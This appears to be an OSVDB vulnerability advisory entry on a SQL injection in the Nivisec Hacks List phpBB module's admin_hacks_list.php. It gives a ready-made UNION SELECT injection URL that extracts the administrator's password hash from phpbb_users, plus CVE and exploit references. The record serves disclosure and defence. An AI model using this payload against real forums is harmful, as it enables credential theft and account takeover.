Nivisec Hacks List admin_hacks_list.php hack_id SQL Injection

2006-11-26T00:00:00
ID OSVDB:35833
Type osvdb
Reporter OSVDB
Modified 2006-11-26T00:00:00

Description

Manual Testing Notes

http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash

References:

ISS X-Force ID: 30533 Generic Exploit URL: http://milw0rm.com/exploits/2851 CVE-2006-6216 Bugtraq ID: 21290